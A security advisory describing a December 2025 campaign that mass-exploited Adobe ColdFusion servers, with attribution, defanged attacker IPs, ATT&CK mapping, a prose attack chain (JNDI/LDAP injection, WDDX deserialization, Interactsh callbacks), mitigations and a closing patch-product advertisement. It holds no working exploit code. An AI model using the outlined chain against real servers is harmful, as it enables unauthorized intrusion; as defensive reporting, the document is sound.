A coordinated exploitation campaign targeted Adobe ColdFusion servers across the globe during the Christmas 2025 holiday period, generating 5,940 malicious requests that probed 10+ ColdFusion CVEs disclosed between 2023 and 2024. Telemetry indicates 68% of the activity occurred on December 25, suggesting deliberate timing to exploit reduced security monitoring during holidays. The vast majority of traffic (98%) originated from two IPs hosted by CTG Server Limited (Japan-based infrastructure), and the actor leveraged ProjectDiscovery Interactsh for out-of-band (OAST) callback verification, with JNDI/LDAP injection as the primary vector.

Background on the Threat Actor Behind the ColdFusion Christmas Campaign

A Single Coordinated Actor Using Japan-Based Infrastructure. Both SecurityAffairs and GreyNoise confirm that the mass exploitation of ColdFusion servers during Christmas 2025 was driven primarily by one threat actor, not multiple groups. This actor operated almost entirely from Japan-based infrastructure owned by CTG Server Limited, a hosting provider known for poor abuse management and previous associations with suspicious activity.

Campaign Overview

• Timeframe: December 2025, peak on Dec 25(68% of traffic).
• Scale: 5,940 ColdFusion-focused requests against 20 countries, United States (4,044 sessions), Spain (753), India (128) among top targets.
• Attribution: Single actor using Japan-based CTG Server Limited infrastructure, two IPs accounted for 98% of observed activity.
• Technique Validation: Interactsh (ProjectDiscovery) used to confirm exploitation via OAST callbacks; JNDI/LDAP injection often paired with WDDX deserialization to reach RCE conditions.
• Automation Indicators: 1–5-second request intervals; concurrent operation of the two IPs; cycling through multiple attack types per target.

Primary Targets

• ColdFusion servers operated by enterprises across North America, Europe, and Asia.
• Public-facing ColdFusion deployments with outdated patches or exposed administrative paths.

Key Characteristics

• Mass CVE exploitation: 10+ distinct ColdFusion vulnerabilities from 2023–2024 targeted in rapid succession.
• Out-of-band verification: Extensive use of Interactsh to confirm callbacks from compromised hosts.
• Deliberate holiday timing: Activity concentrated on Christmas Day, indicative of operational discipline and awareness of defender gaps.

Vulnerability Details

Tactics and Techniques (MITRE ATT&CK)

• TA0001 – Initial Access: Exploit public-facing ColdFusion applications via JNDI/LDAP injection, deserialization RCE, and access control bypass.
• TA0008 – Lateral Movement: Post-access expansion through ColdFusion administrator endpoints or dropped webshells.
• TA0005 – Defense Evasion: OAST callbacks and minimal on-disk artifacts; template-driven scans to blend with background noise.

Indicators of Compromise (IOCs)

Primary Threat Actor Infrastructure (CTG Server Limited – AS152194):

• 134.122.136[.]119
• 134.122.136[.]96

Infection Method

Initial Access

Attackers scan for internet-exposed ColdFusion servers and send crafted HTTP requests that exercise deserialization (WDDX) or path/access bypass flaws on CFM/CFC endpoints, aiming for pre-auth code execution.

Exploitation

Primary vector is JNDI/LDAP injection chained through unsafe deserialization, commonly validated via Interactsh OAST callbacks to confirm vulnerable hosts in near real-time.

Payload Delivery

The actor relies on lightweight, callback-centric validation rather than bulky malware; webshells or in-memory execution may follow successful checks, reducing forensic artifacts.

Execution & Persistence

Post-exploitation involves admin endpoint access, webshell deployment, or further exploitation of N-day flaws to maintain access; the campaign’s cadence (1–5s) and multi-vector cycling indicate automated, persistence-focused operations.

Command-and-Control (C2)

C2 behavior primarily leverages OAST interactions and legitimate web interfaces, eschewing noisy beacons to evade traditional endpoint detection.

Impact

• Pre-auth RCE & Access Bypass: Enables long-term unauthorized access, webshell deployment, and administrative manipulation of ColdFusion instances.
• Service Risk: Chained exploits can degrade or disrupt critical web apps that rely on ColdFusion.
• Broader Operation: ColdFusion exploitation represents 0.2% of a larger reconnaissance campaign that generated 2.5M+ requests across 767 CVEs and 47+ tech stacks, pointing to Initial Access Broker-style activity.

Visual Flow

Initial Access (pre-auth deserialization / access bypass) -> Exploitation (JNDI/LDAP + OAST callback verification) -> Post-Access (webshells / admin endpoints / file reads) -> Lateral Movement & Persistence (legitimate interfaces, low-noise ops)

Mitigation Steps

Patch & Harden Immediately: Update ColdFusion to the latest security updates.

Lock Down Admin & CFIDE Paths: Disable or restrict /CFIDE/administrator and related endpoints, enforce IP allow-listing and MFA, follow ColdFusion Lockdown Guide.

Detect OAST/JNDI Indicators: Monitor for Interactsh callback domains and JNDI/LDAP artifacts.

Threat Hunting & Response: Review logs for suspicious access to CFIDE/CFC endpoints, unexpected packet captures, and webshell indicators; respond with credential rotation and host isolation if compromise suspected.

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.